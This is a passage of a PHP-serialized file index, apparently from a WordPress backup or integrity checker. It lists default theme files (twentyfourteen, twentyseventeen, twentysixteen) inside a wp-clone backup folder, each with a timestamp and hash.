s:1:"h";s:32:"d4ef0e158f5a1f8443bf97114a8d2b57";}s:86:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/author.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"151ee220f67d7ae1bdf7bda3f5bc1059";}s:88:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/category.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"c6c3c886c3d540398f7bdf0780af253d";}s:88:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/comments.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"2efffbbaf999ea105fdd87eb7f5802ec";}s:93:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/content-aside.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"ab91aa87aa7912c72a73d3240c9c7552";}s:93:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/content-audio.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"18fd6764d8e84c235cf608de19a2ac7c";}s:101:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/content-featured-post.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"60c3cc0b0f5810b027a067545c6429d8";}s:95:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/content-gallery.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"f3e41626ce9c510857c69760a49e1c77";}s:93:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/content-image.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"4b047923a816247ee4a32070b3e9c781";}s:92:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/content-link.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"672556d294d18deaeaf88e1bd4aa63a2";}s:92:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/content-none.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"03870915e35d081758261432e7fe5f01";}s:92:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/content-page.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"66dad33222d97a59086c0ffa2f9cb683";}s:93:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/content-quote.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"9e64d4eb0b08db6b14f1fb498f393caa";}s:93:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/content-video.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"d85fe3394e177674d028dcb6c0012e10";}s:87:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/content.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"fb9aef43aa9619c54b5aa197cbb33fc0";}s:96:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/css/editor-style.css";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"9a23a1e96059c33072dce3fd9f893f6e";}s:86:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/css/ie.css";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"da04c78e3fc2016e9ef44f6adce36541";}s:96:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/featured-content.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"01f551fb2071cf9eee3256abfc1cfc77";}s:86:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/footer.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"71b7c04ae5bfe6196e6a399a54f105c8";}s:89:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/functions.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"048932e5a833c103a973237e16b5e768";}s:98:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/genericons/COPYING.txt";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"b9423b96eb6160477fd4a2b7de890419";}s:109:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/genericons/Genericons-Regular.otf";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"d131056b90b61a4ed8d82b883e148411";}s:98:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/genericons/LICENSE.txt";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"b234ee4d69f5fce4486a80fdaf4a4263";}s:97:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/genericons/README.txt";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"4923271c0e79b5a346a440b9c0c76422";}s:122:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/genericons/font/genericons-regular-webfont.eot";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"adf093b1ec7239c03865a87ae6d60160";}s:122:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/genericons/font/genericons-regular-webfont.svg";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"da07151366f79da6116cf5cfc3cc477b";}s:122:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/genericons/font/genericons-regular-webfont.ttf";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"f83f27fb1bfd20d64ba2ae3eaaf4b1ca";}s:123:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/genericons/font/genericons-regular-webfont.woff";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"db7a8d16b367e4c38591be6d7e979876";}s:101:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/genericons/genericons.css";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"8604c201ca1b346289d82daf2b6c91f6";}s:86:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/header.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"579ffab1a187693f540206a09ced13c1";}s:85:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/image.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"d0ab7007099a440c088a95c6c62e722e";}s:99:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/images/pattern-dark.svg";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"ba45bdbe5bfd2ec67435d5e1ad05006b";}s:100:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/images/pattern-light.svg";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"ff69a6fd14bf4770b36a8880bf53dda8";}s:95:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/inc/back-compat.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"b29ac75d7a34a9cd14f1ab9e660fdfae";}s:97:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/inc/custom-header.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"6300f93c453609b506a93b11e62e2a2b";}s:94:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/inc/customizer.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"1eca603f911619ea4ffd5c8e29de8900";}s:100:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/inc/featured-content.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"f2536a0292c468f72832b79aa39114d2";}s:97:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/inc/template-tags.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"9c84b1ab626b2dc56ab919c42c8479cd";}s:91:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/inc/widgets.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"eca319d77d4f2599cfe05bdf7e588638";}s:85:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/index.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"015e97abd72a9d31ba1e78f7a2d3b623";}s:92:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/js/customizer.js";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"c2076270975f96875b8472e3242fbacd";}s:104:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/js/featured-content-admin.js";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"ca00eaecff50d9777022a34c4b36dbd8";}s:91:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/js/functions.js";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"922b981634bb3c5c3e5bcec9d213729a";}s:87:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/js/html5.js";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"5a98a86b5cb48c1506f338463259ce41";}s:107:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/js/keyboard-image-navigation.js";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"9ec09e3f667433fcc24b25abb4d91700";}s:88:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/js/slider.js";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"fb29961d43dba40012014728e02cb4ed";}s:107:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/page-templates/contributors.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"1c2aa2f090782f3e37ff65878be943b5";}s:105:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/page-templates/full-width.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"4302651322f5c66dbafcb6006f8273e3";}s:84:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/page.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"0b1b4da93b446a0352ef3fa9fa0f0881";}s:86:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/readme.txt";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"633e45d006e81836e989e8c78578d15e";}s:83:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/rtl.css";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"6ee846a10d65a4f8327d52e5c436740d";}s:86:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/search.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"576673884375879acedaef607da3f4e0";}s:95:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/sidebar-content.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"bf0102a3fcc88324d1d200444fa6b14b";}s:94:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/sidebar-footer.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"e007ab6019e9dc6b74d699f3cc7c2c36";}s:87:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/sidebar.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"4f526ee15d266497fbe7fe8e129c8d6e";}s:86:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/single.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"194efe4f47287621248a754cf99ae261";}s:85:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/style.css";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"c164454a369e1ec936a3c13f92e60f01";}s:83:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/tag.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"b98b612c84922756c9b106eb4adb4515";}s:100:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/taxonomy-post_format.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"b82e1917fcb15c2b36eddece8121a684";}s:84:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/404.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"02971dab52ad629a54a3a66959539adb";}s:87:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/README.txt";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"31d0630824e3f826da26d8f422217697";}s:88:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/archive.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"0e793b23a77ba59db7e729215f0632e0";}s:103:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/assets/css/colors-dark.css";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"aac44c2a216a0f513d3840a2bc658753";}s:104:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/assets/css/editor-style.css";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"89707d634197e581e1125aa438996a01";}s:95:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/assets/css/ie8.css";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"852fbe6543c4516b911375d6437776f8";}s:95:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/assets/css/ie9.css";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"9ad681950eb4b5e2df5b59000ba6eecc";}s:104:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/assets/images/svg-icons.svg";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"e115e9f7a2735b66785f636e5fc8a578";}s:108:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/assets/js/customize-controls.js";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"40b9f4e508e69c632a6874d4c70c8281";}s:107:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/assets/js/customize-preview.js";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"2caf33b39a49cd70a6ac4bd531061d38";}s:96:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/assets/js/global.js";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"33e2c8ad1905b996e9026b408c2a6c6e";}s:95:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/assets/js/html5.js";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"5ee990907b315027da600eeeaee2e04b";}s:105:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/assets/js/jquery.scrollTo.js";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"16fb1664ddebf663a909c51d40ad7914";}s:100:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/assets/js/navigation.js";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"a1b6700f33c6b26416732e62b04e173d";}s:109:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/assets/js/skip-link-focus-fix.js";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"75abd4cd8807b312f9f7faeb77ee774b";}s:89:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/comments.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"0a8250d7cd2bdef7a718e661819ac44d";}s:87:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/footer.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"78a68dd82005ae36a5d56e6d4bfa6551";}s:91:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/front-page.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"3019de40bce4ee44b70fd5d007dc9368";}s:90:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/functions.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"0c450edf0f566952c1c50d85c616fb60";}s:87:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/header.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"fc93cce365c91f76257cbebf98f4c76f";}s:96:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/inc/back-compat.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"8dd5aeff7f1cba172bd549e2da261b1d";}s:99:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/inc/color-patterns.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"69c925d67ff91fa93f26ce07b4ab113f";}s:98:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/inc/custom-header.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"7ca530923fbfe7cc7ed464943e89eea9";}s:95:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/inc/customizer.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"81cec651efd6815bea7f8895566b8953";}s:99:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/inc/icon-functions.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"86082756dfe6ca03f79ad840abbc63d4";}s:103:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/inc/template-functions.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"3cf1189ad3f39c9a0628f67fb132f441";}s:98:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/inc/template-tags.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"d9ec0fc6b49631d4be268ff52333de33";}s:86:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/index.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"5d154539937cd23f3e72ee3be1bdb5e8";}s:85:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/page.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"c20f3605502315fa3d91176aba110d2f";}s:84:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/rtl.css";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"1ec9a9d3a9077d7975996a1f0cd029b6";}s:87:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/search.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"5561a481e3b0fd2b9c71d1bef699dc42";}s:91:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/searchform.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"ccd8c9629d12332988a445cf9be8c1ba";}s:88:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/sidebar.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"32b55008fa15da6e94cd7b2949c9f843";}s:87:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/single.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"1347900b0e9722c3fccd1d857d517124";}s:86:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/style.css";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"beb9c40b30dd39b7386cf28368f62ee6";}s:117:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/template-parts/footer/footer-widgets.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"04829a7b72a841990bffeb58dd546555";}s:112:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/template-parts/footer/site-info.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"416a27e72d2d4c6468f971583cda229c";}s:115:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/template-parts/header/header-image.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"9eff21753acfc64c1231f8a398168d95";}s:116:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/template-parts/header/site-branding.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"259fb118de2b81b33877b87703cd1e4f";}s:121:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/template-parts/navigation/navigation-top.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"2382539bbf435e6027e6b7bd15ca91ee";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/template-parts/page/content-front-page-panels.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"d64a00313249cc33a53adf0b9eecc818";}s:119:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/template-parts/page/content-front-page.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"f317c9dfa91debd3d0563ba5dfca61ac";}s:113:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/template-parts/page/content-page.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"0693cedf2e76687c4f5b467b291ee0c1";}s:114:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/template-parts/post/content-audio.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"0f184c47416475401f6d8de7ceb6f260";}s:116:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/template-parts/post/content-excerpt.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"4cccb28c1dac1a181c20d0a613aae285";}s:116:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/template-parts/post/content-gallery.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"bfcfc5f6d5a2e09a32440e558751d44c";}s:114:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/template-parts/post/content-image.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"f2df44f27b35eaf30fedf6b3dedbb8fe";}s:113:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/template-parts/post/content-none.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"172608680e01601d364b059af1c2a41a";}s:114:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/template-parts/post/content-video.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"e6010bbcb77eec9388f217fc5a63615c";}s:108:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyseventeen/template-parts/post/content.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"14f272fb2fa3049200d49598352114fc";}s:82:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/404.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"38c8974713403d0c1d2f36bc28c90de0";}s:86:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/archive.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"6f6cbdb939a4eefc69ad7e6565150a00";}s:87:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/comments.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"6eef443e449757ea25f45f5d7e8d1596";}s:95:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/css/editor-style.css";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"da427a0a33a4f0748d1faef4618a49df";}s:85:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/css/ie.css";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"c4befec0a6e11c831ed7f4c188181b6a";}s:86:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/css/ie7.css";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"b0c5ff1a5ebdd5862688eb0674496ddd";}s:86:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/css/ie8.css";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"22870c763f8a125017fe2efc543c57d0";}s:85:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/footer.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"2649588fad6ff41ecc1f129010cf4f71";}s:88:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/functions.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"eaff59206c24f77032b9afa4e1909afb";}s:97:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/genericons/COPYING.txt";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"b9423b96eb6160477fd4a2b7de890419";}s:100:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/genericons/Genericons.eot";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"bebb165302a5d3a90ab9012f3b5d733e";}s:100:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/genericons/Genericons.svg";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"29816c642aaa0e5a8c9402f4d2da62cf";}s:100:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/genericons/Genericons.ttf";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"008827208ffc4eeab99bf3cc14fe1e56";}s:101:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/genericons/Genericons.woff";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"f3f73b280148eeed102d4a6874ac7886";}s:97:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/genericons/LICENSE.txt";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"b234ee4d69f5fce4486a80fdaf4a4263";}s:95:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/genericons/README.md";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"031ec4ed36a007d7d9f15600d7ebd5e8";}s:100:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/genericons/genericons.css";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"13a6500ddf36c6dd581877aefc78d34d";}s:85:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/header.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"ab5146424e9be12155ac61ee86ecc6e5";}s:84:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/image.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"b2870b12d1692538a157f70f92d5194f";}s:94:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/inc/back-compat.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"9b9bcb80065e860f6cea17ae74f1df8c";}s:93:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/inc/customizer.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"78a2097a43e54884275bfbc37ba29630";}s:96:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/inc/template-tags.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"7e6c97ec036c63c633bd5529c5d90b56";}s:84:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/index.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"e892c7110a2cbfcaaa25a0dc4e832a19";}s:101:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/js/color-scheme-control.js";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"5a95c970e1edcdf6322ff93e297e4f7a";}s:98:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/js/customize-preview.js";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"3241a807c07ff37024d5a318b14a54d0";}s:90:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/js/functions.js";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"41ea2a94670de0e183c4262b67784399";}s:86:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/js/html5.js";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"5ee990907b315027da600eeeaee2e04b";}s:106:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/js/keyboard-image-navigation.js";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"5de7ed2727c193e9f32f5797a590889e";}s:100:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/js/skip-link-focus-fix.js";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"f1224221e5eecb4831ade6b6ad2f5073";}s:83:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/page.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"b9e96fcae16a74cc6dfa4a703ba05ad1";}s:85:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/readme.txt";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"7c89b278cf9dda5c4e413396dd267be8";}s:82:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/rtl.css";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"8ec2f57f74